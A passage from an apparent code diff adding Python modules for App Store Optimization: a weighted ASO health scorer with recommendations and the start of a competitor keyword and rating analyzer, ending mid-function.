    Convenience function to plan an A/B test.

    Args:
        test_type: Type of test
        variant_a: Control variant
        variant_b: Test variant
        hypothesis: Test hypothesis
        baseline_conversion: Current conversion rate

    Returns:
        Complete test plan
    """
    planner = ABTestPlanner()

    test_design = planner.design_test(
        test_type,
        variant_a,
        variant_b,
        hypothesis
    )

    sample_size = planner.calculate_sample_size(
        baseline_conversion,
        planner.MIN_EFFECT_SIZES.get(test_type, 0.05)
    )

    return {
        'test_design': test_design,
        'sample_size_requirements': sample_size
    }
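The two-proportion sample-size formula implemented in `calculate_sample_size` above can be sketched as a standalone snippet. This is an illustrative reduction, not part of the committed file; the function name `sample_size_per_variant` and the example rates are hypothetical, and the default z-scores correspond to the same 95%-confidence, 80%-power case the planner uses.

```python
import math

def sample_size_per_variant(baseline: float, mde: float,
                            z_alpha: float = 1.96, z_beta: float = 0.84) -> int:
    """Visitors needed per variant to detect a relative lift `mde` over
    `baseline` (two-tailed, 95% confidence, 80% power by default)."""
    expected = baseline * (1 + mde)              # variant B's expected rate
    p_pooled = (baseline + expected) / 2         # pooled conversion rate
    sd_pooled = math.sqrt(2 * p_pooled * (1 - p_pooled))
    return math.ceil(((z_alpha + z_beta) ** 2 * sd_pooled ** 2)
                     / ((expected - baseline) ** 2))

# A 5% baseline conversion with a 10% relative lift needs roughly
# 31,000 visitors per variant before the difference is detectable.
print(sample_size_per_variant(0.05, 0.10))
```

Note how quickly the requirement grows as the minimum detectable effect shrinks: the denominator is quadratic in the absolute difference, which is why the planner warns about small effects on low-traffic pages.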
482
packages/llm/skills/app-store-optimization/aso_scorer.py
Normal file
@ -0,0 +1,482 @@
"""
ASO scoring module for App Store Optimization.
Calculates comprehensive ASO health score across multiple dimensions.
"""

from typing import Dict, List, Any, Optional


class ASOScorer:
    """Calculates overall ASO health score and provides recommendations."""

    # Score weights for different components (total = 100)
    WEIGHTS = {
        'metadata_quality': 25,
        'ratings_reviews': 25,
        'keyword_performance': 25,
        'conversion_metrics': 25
    }

    # Benchmarks for scoring
    BENCHMARKS = {
        'title_keyword_usage': {'min': 1, 'target': 2},
        'description_length': {'min': 500, 'target': 2000},
        'keyword_density': {'min': 2, 'optimal': 5, 'max': 8},
        'average_rating': {'min': 3.5, 'target': 4.5},
        'ratings_count': {'min': 100, 'target': 5000},
        'keywords_top_10': {'min': 2, 'target': 10},
        'keywords_top_50': {'min': 5, 'target': 20},
        'conversion_rate': {'min': 0.02, 'target': 0.10}
    }

    def __init__(self):
        """Initialize ASO scorer."""
        self.score_breakdown = {}

    def calculate_overall_score(
        self,
        metadata: Dict[str, Any],
        ratings: Dict[str, Any],
        keyword_performance: Dict[str, Any],
        conversion: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Calculate comprehensive ASO score (0-100).

        Args:
            metadata: Title, description quality metrics
            ratings: Rating average and count
            keyword_performance: Keyword ranking data
            conversion: Impression-to-install metrics

        Returns:
            Overall score with detailed breakdown
        """
        # Calculate component scores
        metadata_score = self.score_metadata_quality(metadata)
        ratings_score = self.score_ratings_reviews(ratings)
        keyword_score = self.score_keyword_performance(keyword_performance)
        conversion_score = self.score_conversion_metrics(conversion)

        # Calculate weighted overall score
        overall_score = (
            metadata_score * (self.WEIGHTS['metadata_quality'] / 100) +
            ratings_score * (self.WEIGHTS['ratings_reviews'] / 100) +
            keyword_score * (self.WEIGHTS['keyword_performance'] / 100) +
            conversion_score * (self.WEIGHTS['conversion_metrics'] / 100)
        )

        # Store breakdown
        self.score_breakdown = {
            'metadata_quality': {
                'score': metadata_score,
                'weight': self.WEIGHTS['metadata_quality'],
                'weighted_contribution': round(metadata_score * (self.WEIGHTS['metadata_quality'] / 100), 1)
            },
            'ratings_reviews': {
                'score': ratings_score,
                'weight': self.WEIGHTS['ratings_reviews'],
                'weighted_contribution': round(ratings_score * (self.WEIGHTS['ratings_reviews'] / 100), 1)
            },
            'keyword_performance': {
                'score': keyword_score,
                'weight': self.WEIGHTS['keyword_performance'],
                'weighted_contribution': round(keyword_score * (self.WEIGHTS['keyword_performance'] / 100), 1)
            },
            'conversion_metrics': {
                'score': conversion_score,
                'weight': self.WEIGHTS['conversion_metrics'],
                'weighted_contribution': round(conversion_score * (self.WEIGHTS['conversion_metrics'] / 100), 1)
            }
        }

        # Generate recommendations
        recommendations = self.generate_recommendations(
            metadata_score,
            ratings_score,
            keyword_score,
            conversion_score
        )

        # Assess overall health
        health_status = self._assess_health_status(overall_score)

        return {
            'overall_score': round(overall_score, 1),
            'health_status': health_status,
            'score_breakdown': self.score_breakdown,
            'recommendations': recommendations,
            'priority_actions': self._prioritize_actions(recommendations),
            'strengths': self._identify_strengths(self.score_breakdown),
            'weaknesses': self._identify_weaknesses(self.score_breakdown)
        }

    def score_metadata_quality(self, metadata: Dict[str, Any]) -> float:
        """
        Score metadata quality (0-100).

        Evaluates:
        - Title optimization
        - Description quality
        - Keyword usage
        """
        scores = []

        # Title score (0-35 points)
        title_keywords = metadata.get('title_keyword_count', 0)
        title_length = metadata.get('title_length', 0)

        title_score = 0
        if title_keywords >= self.BENCHMARKS['title_keyword_usage']['target']:
            title_score = 35
        elif title_keywords >= self.BENCHMARKS['title_keyword_usage']['min']:
            title_score = 25
        else:
            title_score = 10

        # Penalize titles that leave most of the available space unused
        if title_length <= 25:
            title_score -= 5

        scores.append(min(title_score, 35))

        # Description score (0-35 points)
        desc_length = metadata.get('description_length', 0)
        desc_quality = metadata.get('description_quality', 0.0)  # 0-1 scale

        desc_score = 0
        if desc_length >= self.BENCHMARKS['description_length']['target']:
            desc_score = 25
        elif desc_length >= self.BENCHMARKS['description_length']['min']:
            desc_score = 15
        else:
            desc_score = 5

        # Add quality bonus
        desc_score += desc_quality * 10
        scores.append(min(desc_score, 35))

        # Keyword density score (0-30 points)
        keyword_density = metadata.get('keyword_density', 0.0)

        if self.BENCHMARKS['keyword_density']['min'] <= keyword_density <= self.BENCHMARKS['keyword_density']['optimal']:
            density_score = 30
        elif keyword_density < self.BENCHMARKS['keyword_density']['min']:
            # Too low - proportional scoring
            density_score = (keyword_density / self.BENCHMARKS['keyword_density']['min']) * 20
        else:
            # Too high (keyword stuffing) - penalty
            excess = keyword_density - self.BENCHMARKS['keyword_density']['optimal']
            density_score = max(30 - (excess * 5), 0)

        scores.append(density_score)

        return round(sum(scores), 1)

    def score_ratings_reviews(self, ratings: Dict[str, Any]) -> float:
        """
        Score ratings and reviews (0-100).

        Evaluates:
        - Average rating
        - Total ratings count
        - Review velocity
        """
        average_rating = ratings.get('average_rating', 0.0)
        total_ratings = ratings.get('total_ratings', 0)
        recent_ratings = ratings.get('recent_ratings_30d', 0)

        # Rating quality score (0-50 points)
        if average_rating >= self.BENCHMARKS['average_rating']['target']:
            rating_quality_score = 50
        elif average_rating >= self.BENCHMARKS['average_rating']['min']:
            # Proportional scoring between min and target
            proportion = (average_rating - self.BENCHMARKS['average_rating']['min']) / \
                         (self.BENCHMARKS['average_rating']['target'] - self.BENCHMARKS['average_rating']['min'])
            rating_quality_score = 30 + (proportion * 20)
        elif average_rating >= 3.0:
            rating_quality_score = 20
        else:
            rating_quality_score = 10

        # Rating volume score (0-30 points)
        if total_ratings >= self.BENCHMARKS['ratings_count']['target']:
            rating_volume_score = 30
        elif total_ratings >= self.BENCHMARKS['ratings_count']['min']:
            # Proportional scoring
            proportion = (total_ratings - self.BENCHMARKS['ratings_count']['min']) / \
                         (self.BENCHMARKS['ratings_count']['target'] - self.BENCHMARKS['ratings_count']['min'])
            rating_volume_score = 15 + (proportion * 15)
        else:
            # Very low volume
            rating_volume_score = (total_ratings / self.BENCHMARKS['ratings_count']['min']) * 15

        # Rating velocity score (0-20 points)
        if recent_ratings > 100:
            velocity_score = 20
        elif recent_ratings > 50:
            velocity_score = 15
        elif recent_ratings > 10:
            velocity_score = 10
        else:
            velocity_score = 5

        total_score = rating_quality_score + rating_volume_score + velocity_score

        return round(min(total_score, 100), 1)

    def score_keyword_performance(self, keyword_performance: Dict[str, Any]) -> float:
        """
        Score keyword ranking performance (0-100).

        Evaluates:
        - Top 10 rankings
        - Top 50 rankings
        - Ranking trends
        """
        top_10_count = keyword_performance.get('top_10', 0)
        top_50_count = keyword_performance.get('top_50', 0)
        top_100_count = keyword_performance.get('top_100', 0)
        improving_keywords = keyword_performance.get('improving_keywords', 0)

        # Top 10 score (0-50 points) - most valuable rankings
        if top_10_count >= self.BENCHMARKS['keywords_top_10']['target']:
            top_10_score = 50
        elif top_10_count >= self.BENCHMARKS['keywords_top_10']['min']:
            proportion = (top_10_count - self.BENCHMARKS['keywords_top_10']['min']) / \
                         (self.BENCHMARKS['keywords_top_10']['target'] - self.BENCHMARKS['keywords_top_10']['min'])
            top_10_score = 25 + (proportion * 25)
        else:
            top_10_score = (top_10_count / self.BENCHMARKS['keywords_top_10']['min']) * 25

        # Top 50 score (0-30 points)
        if top_50_count >= self.BENCHMARKS['keywords_top_50']['target']:
            top_50_score = 30
        elif top_50_count >= self.BENCHMARKS['keywords_top_50']['min']:
            proportion = (top_50_count - self.BENCHMARKS['keywords_top_50']['min']) / \
                         (self.BENCHMARKS['keywords_top_50']['target'] - self.BENCHMARKS['keywords_top_50']['min'])
            top_50_score = 15 + (proportion * 15)
        else:
            top_50_score = (top_50_count / self.BENCHMARKS['keywords_top_50']['min']) * 15

        # Coverage score (0-10 points) - based on top 100
        coverage_score = min((top_100_count / 30) * 10, 10)

        # Trend score (0-10 points) - are rankings improving?
        if improving_keywords > 5:
            trend_score = 10
        elif improving_keywords > 0:
            trend_score = 5
        else:
            trend_score = 0

        total_score = top_10_score + top_50_score + coverage_score + trend_score

        return round(min(total_score, 100), 1)

    def score_conversion_metrics(self, conversion: Dict[str, Any]) -> float:
        """
        Score conversion performance (0-100).

        Evaluates:
        - Impression-to-install conversion rate
        - Download velocity
        """
        conversion_rate = conversion.get('impression_to_install', 0.0)
        downloads_30d = conversion.get('downloads_last_30_days', 0)
        downloads_trend = conversion.get('downloads_trend', 'stable')  # 'up', 'stable', 'down'

        # Conversion rate score (0-70 points)
        if conversion_rate >= self.BENCHMARKS['conversion_rate']['target']:
            conversion_score = 70
        elif conversion_rate >= self.BENCHMARKS['conversion_rate']['min']:
            proportion = (conversion_rate - self.BENCHMARKS['conversion_rate']['min']) / \
                         (self.BENCHMARKS['conversion_rate']['target'] - self.BENCHMARKS['conversion_rate']['min'])
            conversion_score = 35 + (proportion * 35)
        else:
            conversion_score = (conversion_rate / self.BENCHMARKS['conversion_rate']['min']) * 35

        # Download velocity score (0-20 points)
        if downloads_30d > 10000:
            velocity_score = 20
        elif downloads_30d > 1000:
            velocity_score = 15
        elif downloads_30d > 100:
            velocity_score = 10
        else:
            velocity_score = 5

        # Trend bonus (0-10 points)
        if downloads_trend == 'up':
            trend_score = 10
        elif downloads_trend == 'stable':
            trend_score = 5
        else:
            trend_score = 0

        total_score = conversion_score + velocity_score + trend_score

        return round(min(total_score, 100), 1)

    def generate_recommendations(
        self,
        metadata_score: float,
        ratings_score: float,
        keyword_score: float,
        conversion_score: float
    ) -> List[Dict[str, Any]]:
        """Generate prioritized recommendations based on scores."""
        recommendations = []

        # Metadata recommendations
        if metadata_score < 60:
            recommendations.append({
                'category': 'metadata_quality',
                'priority': 'high',
                'action': 'Optimize app title and description',
                'details': 'Add more keywords to title, expand description to 1500-2000 characters, improve keyword density to 3-5%',
                'expected_impact': 'Improve discoverability and ranking potential'
            })
        elif metadata_score < 80:
            recommendations.append({
                'category': 'metadata_quality',
                'priority': 'medium',
                'action': 'Refine metadata for better keyword targeting',
                'details': 'Test variations of title/subtitle, optimize keyword field for Apple',
                'expected_impact': 'Incremental ranking improvements'
            })

        # Ratings recommendations
        if ratings_score < 60:
            recommendations.append({
                'category': 'ratings_reviews',
                'priority': 'high',
                'action': 'Improve rating quality and volume',
                'details': 'Address top user complaints, implement in-app rating prompts, respond to negative reviews',
                'expected_impact': 'Better conversion rates and trust signals'
            })
        elif ratings_score < 80:
            recommendations.append({
                'category': 'ratings_reviews',
                'priority': 'medium',
                'action': 'Increase rating velocity',
                'details': 'Optimize timing of rating requests, encourage satisfied users to rate',
                'expected_impact': 'Sustained rating quality'
            })

        # Keyword performance recommendations
        if keyword_score < 60:
            recommendations.append({
                'category': 'keyword_performance',
                'priority': 'high',
                'action': 'Improve keyword rankings',
                'details': 'Target long-tail keywords with lower competition, update metadata with high-potential keywords, build backlinks',
                'expected_impact': 'Significant improvement in organic visibility'
            })
        elif keyword_score < 80:
            recommendations.append({
                'category': 'keyword_performance',
                'priority': 'medium',
                'action': 'Expand keyword coverage',
|
||||
'details': 'Target additional related keywords, test seasonal keywords, localize for new markets',
|
||||
'expected_impact': 'Broader reach and more discovery opportunities'
|
||||
})
|
||||
|
||||
# Conversion recommendations
|
||||
if conversion_score < 60:
|
||||
recommendations.append({
|
||||
'category': 'conversion_metrics',
|
||||
'priority': 'high',
|
||||
'action': 'Optimize store listing for conversions',
|
||||
'details': 'Improve screenshots and icon, strengthen value proposition in description, add video preview',
|
||||
'expected_impact': 'Higher impression-to-install conversion'
|
||||
})
|
||||
elif conversion_score < 80:
|
||||
recommendations.append({
|
||||
'category': 'conversion_metrics',
|
||||
'priority': 'medium',
|
||||
'action': 'Test visual asset variations',
|
||||
'details': 'A/B test different icon designs and screenshot sequences',
|
||||
'expected_impact': 'Incremental conversion improvements'
|
||||
})
|
||||
|
||||
return recommendations
|
||||
|
||||
def _assess_health_status(self, overall_score: float) -> str:
|
||||
"""Assess overall ASO health status."""
|
||||
if overall_score >= 80:
|
||||
return "Excellent - Top-tier ASO performance"
|
||||
elif overall_score >= 65:
|
||||
return "Good - Competitive ASO with room for improvement"
|
||||
elif overall_score >= 50:
|
||||
return "Fair - Needs strategic improvements"
|
||||
else:
|
||||
return "Poor - Requires immediate ASO overhaul"
|
||||
|
||||
def _prioritize_actions(
|
||||
self,
|
||||
recommendations: List[Dict[str, Any]]
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""Prioritize actions by impact and urgency."""
|
||||
# Sort by priority (high first) and expected impact
|
||||
priority_order = {'high': 0, 'medium': 1, 'low': 2}
|
||||
|
||||
sorted_recommendations = sorted(
|
||||
recommendations,
|
||||
key=lambda x: priority_order[x['priority']]
|
||||
)
|
||||
|
||||
return sorted_recommendations[:3] # Top 3 priority actions
|
||||
|
||||
def _identify_strengths(self, score_breakdown: Dict[str, Any]) -> List[str]:
|
||||
"""Identify areas of strength (scores >= 75)."""
|
||||
strengths = []
|
||||
|
||||
for category, data in score_breakdown.items():
|
||||
if data['score'] >= 75:
|
||||
strengths.append(
|
||||
f"{category.replace('_', ' ').title()}: {data['score']}/100"
|
||||
)
|
||||
|
||||
return strengths if strengths else ["Focus on building strengths across all areas"]
|
||||
|
||||
def _identify_weaknesses(self, score_breakdown: Dict[str, Any]) -> List[str]:
|
||||
"""Identify areas needing improvement (scores < 60)."""
|
||||
weaknesses = []
|
||||
|
||||
for category, data in score_breakdown.items():
|
||||
if data['score'] < 60:
|
||||
weaknesses.append(
|
||||
f"{category.replace('_', ' ').title()}: {data['score']}/100 - needs improvement"
|
||||
)
|
||||
|
||||
return weaknesses if weaknesses else ["All areas performing adequately"]
|
||||
|
||||
|
||||
def calculate_aso_score(
|
||||
metadata: Dict[str, Any],
|
||||
ratings: Dict[str, Any],
|
||||
keyword_performance: Dict[str, Any],
|
||||
conversion: Dict[str, Any]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to calculate ASO score.
|
||||
|
||||
Args:
|
||||
metadata: Metadata quality metrics
|
||||
ratings: Ratings data
|
||||
keyword_performance: Keyword ranking data
|
||||
conversion: Conversion metrics
|
||||
|
||||
Returns:
|
||||
Complete ASO score report
|
||||
"""
|
||||
scorer = ASOScorer()
|
||||
return scorer.calculate_overall_score(
|
||||
metadata,
|
||||
ratings,
|
||||
keyword_performance,
|
||||
conversion
|
||||
)
|
||||
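The conversion-rate component above uses a piecewise benchmark interpolation: linear from 0 to 35 points below the minimum benchmark, linear from 35 to 70 points between the minimum and target, and a flat 70 at or above target. It can be sketched as a standalone function; the `minimum` and `target` values here are illustrative placeholders, since the actual `BENCHMARKS` table is defined elsewhere in the module.

```python
def conversion_rate_score(rate: float, minimum: float = 0.02, target: float = 0.05) -> float:
    """Piecewise conversion-rate score (0-70 points), mirroring score_conversion."""
    if rate >= target:
        # At or above the target benchmark: full 70 points
        return 70.0
    if rate >= minimum:
        # Between minimum and target: interpolate linearly from 35 to 70
        proportion = (rate - minimum) / (target - minimum)
        return 35.0 + proportion * 35.0
    # Below the minimum benchmark: scale linearly from 0 to 35
    return (rate / minimum) * 35.0
```

With the placeholder benchmarks, a rate exactly at `minimum` scores 35, the midpoint scores 52.5, and anything at or past `target` caps at 70.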
@@ -0,0 +1,577 @@
"""
Competitor analysis module for App Store Optimization.
Analyzes top competitors' ASO strategies and identifies opportunities.
"""

from typing import Dict, List, Any, Optional
from collections import Counter
import re


class CompetitorAnalyzer:
    """Analyzes competitor apps to identify ASO opportunities."""

    def __init__(self, category: str, platform: str = 'apple'):
        """
        Initialize competitor analyzer.

        Args:
            category: App category (e.g., "Productivity", "Games")
            platform: 'apple' or 'google'
        """
        self.category = category
        self.platform = platform
        self.competitors = []

    def analyze_competitor(
        self,
        app_data: Dict[str, Any]
    ) -> Dict[str, Any]:
        """
        Analyze a single competitor's ASO strategy.

        Args:
            app_data: Dictionary with app_name, title, description, rating, ratings_count, keywords

        Returns:
            Comprehensive competitor analysis
        """
        app_name = app_data.get('app_name', '')
        title = app_data.get('title', '')
        description = app_data.get('description', '')
        rating = app_data.get('rating', 0.0)
        ratings_count = app_data.get('ratings_count', 0)
        keywords = app_data.get('keywords', [])

        analysis = {
            'app_name': app_name,
            'title_analysis': self._analyze_title(title),
            'description_analysis': self._analyze_description(description),
            'keyword_strategy': self._extract_keyword_strategy(title, description, keywords),
            'rating_metrics': {
                'rating': rating,
                'ratings_count': ratings_count,
                'rating_quality': self._assess_rating_quality(rating, ratings_count)
            },
            'competitive_strength': self._calculate_competitive_strength(
                rating,
                ratings_count,
                len(description)
            ),
            'key_differentiators': self._identify_differentiators(description)
        }

        self.competitors.append(analysis)
        return analysis

    def compare_competitors(
        self,
        competitors_data: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Compare multiple competitors and identify patterns.

        Args:
            competitors_data: List of competitor data dictionaries

        Returns:
            Comparative analysis with insights
        """
        # Analyze each competitor
        analyses = []
        for comp_data in competitors_data:
            analysis = self.analyze_competitor(comp_data)
            analyses.append(analysis)

        # Extract common keywords across competitors
        all_keywords = []
        for analysis in analyses:
            all_keywords.extend(analysis['keyword_strategy']['primary_keywords'])

        common_keywords = self._find_common_keywords(all_keywords)

        # Identify keyword gaps (used by some but not all)
        keyword_gaps = self._identify_keyword_gaps(analyses)

        # Rank competitors by strength
        ranked_competitors = sorted(
            analyses,
            key=lambda x: x['competitive_strength'],
            reverse=True
        )

        # Analyze rating distribution
        rating_analysis = self._analyze_rating_distribution(analyses)

        # Identify best practices
        best_practices = self._identify_best_practices(ranked_competitors)

        return {
            'category': self.category,
            'platform': self.platform,
            'competitors_analyzed': len(analyses),
            'ranked_competitors': ranked_competitors,
            'common_keywords': common_keywords,
            'keyword_gaps': keyword_gaps,
            'rating_analysis': rating_analysis,
            'best_practices': best_practices,
            'opportunities': self._identify_opportunities(
                analyses,
                common_keywords,
                keyword_gaps
            )
        }

    def identify_gaps(
        self,
        your_app_data: Dict[str, Any],
        competitors_data: List[Dict[str, Any]]
    ) -> Dict[str, Any]:
        """
        Identify gaps between your app and competitors.

        Args:
            your_app_data: Your app's data
            competitors_data: List of competitor data

        Returns:
            Gap analysis with actionable recommendations
        """
        # Analyze your app
        your_analysis = self.analyze_competitor(your_app_data)

        # Analyze competitors
        competitor_comparison = self.compare_competitors(competitors_data)

        # Identify keyword gaps
        your_keywords = set(your_analysis['keyword_strategy']['primary_keywords'])
        competitor_keywords = set(competitor_comparison['common_keywords'])
        missing_keywords = competitor_keywords - your_keywords

        # Identify rating gap
        avg_competitor_rating = competitor_comparison['rating_analysis']['average_rating']
        rating_gap = avg_competitor_rating - your_analysis['rating_metrics']['rating']

        # Identify description length gap
        avg_competitor_desc_length = sum(
            len(comp['description_analysis']['text'])
            for comp in competitor_comparison['ranked_competitors']
        ) / len(competitor_comparison['ranked_competitors'])
        your_desc_length = len(your_analysis['description_analysis']['text'])
        desc_length_gap = avg_competitor_desc_length - your_desc_length

        return {
            'your_app': your_analysis,
            'keyword_gaps': {
                'missing_keywords': list(missing_keywords)[:10],
                'recommendations': self._generate_keyword_recommendations(missing_keywords)
            },
            'rating_gap': {
                'your_rating': your_analysis['rating_metrics']['rating'],
                'average_competitor_rating': avg_competitor_rating,
                'gap': round(rating_gap, 2),
                'action_items': self._generate_rating_improvement_actions(rating_gap)
            },
            'content_gap': {
                'your_description_length': your_desc_length,
                'average_competitor_length': int(avg_competitor_desc_length),
                'gap': int(desc_length_gap),
                'recommendations': self._generate_content_recommendations(desc_length_gap)
            },
            'competitive_positioning': self._assess_competitive_position(
                your_analysis,
                competitor_comparison
            )
        }

    def _analyze_title(self, title: str) -> Dict[str, Any]:
        """Analyze title structure and keyword usage."""
        parts = re.split(r'[-:|]', title)

        return {
            'title': title,
            'length': len(title),
            'has_brand': len(parts) > 0,
            'has_keywords': len(parts) > 1,
            'components': [part.strip() for part in parts],
            'word_count': len(title.split()),
            'strategy': 'brand_plus_keywords' if len(parts) > 1 else 'brand_only'
        }

    def _analyze_description(self, description: str) -> Dict[str, Any]:
        """Analyze description structure and content."""
        lines = description.split('\n')
        word_count = len(description.split())

        # Check for structural elements
        has_bullet_points = '•' in description or '*' in description
        has_sections = any(line.isupper() for line in lines if len(line) > 0)
        has_call_to_action = any(
            cta in description.lower()
            for cta in ['download', 'try', 'get', 'start', 'join']
        )

        # Extract features mentioned
        features = self._extract_features(description)

        return {
            'text': description,
            'length': len(description),
            'word_count': word_count,
            'structure': {
                'has_bullet_points': has_bullet_points,
                'has_sections': has_sections,
                'has_call_to_action': has_call_to_action
            },
            'features_mentioned': features,
            'readability': 'good' if 50 <= word_count <= 300 else 'needs_improvement'
        }

    def _extract_keyword_strategy(
        self,
        title: str,
        description: str,
        explicit_keywords: List[str]
    ) -> Dict[str, Any]:
        """Extract keyword strategy from metadata."""
        # Extract keywords from title
        title_keywords = [word.lower() for word in title.split() if len(word) > 3]

        # Extract frequently used words from description
        desc_words = re.findall(r'\b\w{4,}\b', description.lower())
        word_freq = Counter(desc_words)
        frequent_words = [word for word, count in word_freq.most_common(15) if count > 2]

        # Combine with explicit keywords
        all_keywords = list(set(title_keywords + frequent_words + explicit_keywords))

        return {
            'primary_keywords': title_keywords,
            'description_keywords': frequent_words[:10],
            'explicit_keywords': explicit_keywords,
            'total_unique_keywords': len(all_keywords),
            'keyword_focus': self._assess_keyword_focus(title_keywords, frequent_words)
        }

    def _assess_rating_quality(self, rating: float, ratings_count: int) -> str:
        """Assess the quality of ratings."""
        if ratings_count < 100:
            return 'insufficient_data'
        elif rating >= 4.5 and ratings_count > 1000:
            return 'excellent'
        elif rating >= 4.0 and ratings_count > 500:
            return 'good'
        elif rating >= 3.5:
            return 'average'
        else:
            return 'poor'

    def _calculate_competitive_strength(
        self,
        rating: float,
        ratings_count: int,
        description_length: int
    ) -> float:
        """
        Calculate overall competitive strength (0-100).

        Factors:
        - Rating quality (40%)
        - Rating volume (30%)
        - Metadata quality (30%)
        """
        # Rating quality score (0-40)
        rating_score = (rating / 5.0) * 40

        # Rating volume score (0-30)
        volume_score = min((ratings_count / 10000) * 30, 30)

        # Metadata quality score (0-30)
        metadata_score = min((description_length / 2000) * 30, 30)

        total_score = rating_score + volume_score + metadata_score

        return round(total_score, 1)

    def _identify_differentiators(self, description: str) -> List[str]:
        """Identify key differentiators from description."""
        differentiator_keywords = [
            'unique', 'only', 'first', 'best', 'leading', 'exclusive',
            'revolutionary', 'innovative', 'patent', 'award'
        ]

        differentiators = []
        sentences = description.split('.')

        for sentence in sentences:
            sentence_lower = sentence.lower()
            if any(keyword in sentence_lower for keyword in differentiator_keywords):
                differentiators.append(sentence.strip())

        return differentiators[:5]

    def _find_common_keywords(self, all_keywords: List[str]) -> List[str]:
        """Find keywords used by multiple competitors."""
        keyword_counts = Counter(all_keywords)
        # Return keywords used by at least 2 competitors
        common = [kw for kw, count in keyword_counts.items() if count >= 2]
        return sorted(common, key=lambda x: keyword_counts[x], reverse=True)[:20]

    def _identify_keyword_gaps(self, analyses: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
        """Identify keywords used by some competitors but not others."""
        all_keywords_by_app = {}

        for analysis in analyses:
            app_name = analysis['app_name']
            keywords = analysis['keyword_strategy']['primary_keywords']
            all_keywords_by_app[app_name] = set(keywords)

        # Find keywords used by some but not all
        all_keywords_set = set()
        for keywords in all_keywords_by_app.values():
            all_keywords_set.update(keywords)

        gaps = []
        for keyword in all_keywords_set:
            using_apps = [
                app for app, keywords in all_keywords_by_app.items()
                if keyword in keywords
            ]
            if 1 < len(using_apps) < len(analyses):
                gaps.append({
                    'keyword': keyword,
                    'used_by': using_apps,
                    'usage_percentage': round(len(using_apps) / len(analyses) * 100, 1)
                })

        return sorted(gaps, key=lambda x: x['usage_percentage'], reverse=True)[:15]

    def _analyze_rating_distribution(self, analyses: List[Dict[str, Any]]) -> Dict[str, Any]:
        """Analyze rating distribution across competitors."""
        ratings = [a['rating_metrics']['rating'] for a in analyses]
        ratings_counts = [a['rating_metrics']['ratings_count'] for a in analyses]

        return {
            'average_rating': round(sum(ratings) / len(ratings), 2),
            'highest_rating': max(ratings),
            'lowest_rating': min(ratings),
            'average_ratings_count': int(sum(ratings_counts) / len(ratings_counts)),
            'total_ratings_in_category': sum(ratings_counts)
        }

    def _identify_best_practices(self, ranked_competitors: List[Dict[str, Any]]) -> List[str]:
        """Identify best practices from top competitors."""
        if not ranked_competitors:
            return []

        top_competitor = ranked_competitors[0]
        practices = []

        # Title strategy
        title_analysis = top_competitor['title_analysis']
        if title_analysis['has_keywords']:
            practices.append(
                f"Title Strategy: Include primary keyword in title (e.g., '{title_analysis['title']}')"
            )

        # Description structure
        desc_analysis = top_competitor['description_analysis']
        if desc_analysis['structure']['has_bullet_points']:
            practices.append("Description: Use bullet points to highlight key features")

        if desc_analysis['structure']['has_sections']:
            practices.append("Description: Organize content with clear section headers")

        # Rating strategy
        rating_quality = top_competitor['rating_metrics']['rating_quality']
        if rating_quality in ['excellent', 'good']:
            practices.append(
                f"Ratings: Maintain high rating quality ({top_competitor['rating_metrics']['rating']}★) "
                f"with significant volume ({top_competitor['rating_metrics']['ratings_count']} ratings)"
            )

        return practices[:5]

    def _identify_opportunities(
        self,
        analyses: List[Dict[str, Any]],
        common_keywords: List[str],
        keyword_gaps: List[Dict[str, Any]]
    ) -> List[str]:
        """Identify ASO opportunities based on competitive analysis."""
        opportunities = []

        # Keyword opportunities from gaps
        if keyword_gaps:
            underutilized_keywords = [
                gap['keyword'] for gap in keyword_gaps
                if gap['usage_percentage'] < 50
            ]
            if underutilized_keywords:
                opportunities.append(
                    f"Target underutilized keywords: {', '.join(underutilized_keywords[:5])}"
                )

        # Rating opportunity
        avg_rating = sum(a['rating_metrics']['rating'] for a in analyses) / len(analyses)
        if avg_rating < 4.5:
            opportunities.append(
                f"Category average rating is {avg_rating:.1f} - opportunity to differentiate with higher ratings"
            )

        # Content depth opportunity
        avg_desc_length = sum(
            a['description_analysis']['length'] for a in analyses
        ) / len(analyses)
        if avg_desc_length < 1500:
            opportunities.append(
                "Competitors have relatively short descriptions - opportunity to provide more comprehensive information"
            )

        return opportunities[:5]

    def _extract_features(self, description: str) -> List[str]:
        """Extract feature mentions from description."""
        # Look for bullet points or numbered lists
        lines = description.split('\n')
        features = []

        for line in lines:
            line = line.strip()
            # Check if line starts with bullet or number
            if line and (line[0] in ['•', '*', '-', '✓'] or line[0].isdigit()):
                # Clean the line
                cleaned = re.sub(r'^[•*\-✓\d.)\s]+', '', line)
                if cleaned:
                    features.append(cleaned)

        return features[:10]

    def _assess_keyword_focus(
        self,
        title_keywords: List[str],
        description_keywords: List[str]
    ) -> str:
        """Assess keyword focus strategy."""
        overlap = set(title_keywords) & set(description_keywords)

        if len(overlap) >= 3:
            return 'consistent_focus'
        elif len(overlap) >= 1:
            return 'moderate_focus'
        else:
            return 'broad_focus'

    def _generate_keyword_recommendations(self, missing_keywords: set) -> List[str]:
        """Generate recommendations for missing keywords."""
        if not missing_keywords:
            return ["Your keyword coverage is comprehensive"]

        recommendations = []
        missing_list = list(missing_keywords)[:5]

        recommendations.append(
            f"Consider adding these competitor keywords: {', '.join(missing_list)}"
        )
        recommendations.append(
            "Test keyword variations in subtitle/promotional text first"
        )
        recommendations.append(
            "Monitor competitor keyword changes monthly"
        )

        return recommendations

    def _generate_rating_improvement_actions(self, rating_gap: float) -> List[str]:
        """Generate actions to improve ratings."""
        actions = []

        if rating_gap > 0.5:
            actions.append("CRITICAL: Significant rating gap - prioritize user satisfaction improvements")
            actions.append("Analyze negative reviews to identify top issues")
            actions.append("Implement in-app rating prompts after positive experiences")
            actions.append("Respond to all negative reviews professionally")
        elif rating_gap > 0.2:
            actions.append("Focus on incremental improvements to close rating gap")
            actions.append("Optimize timing of rating requests")
        else:
            actions.append("Ratings are competitive - maintain quality and continue improvements")

        return actions

    def _generate_content_recommendations(self, desc_length_gap: int) -> List[str]:
        """Generate content recommendations based on length gap."""
        recommendations = []

        if desc_length_gap > 500:
            recommendations.append(
                "Expand description to match competitor detail level"
            )
            recommendations.append(
                "Add use case examples and success stories"
            )
            recommendations.append(
                "Include more feature explanations and benefits"
            )
        elif desc_length_gap < -500:
            recommendations.append(
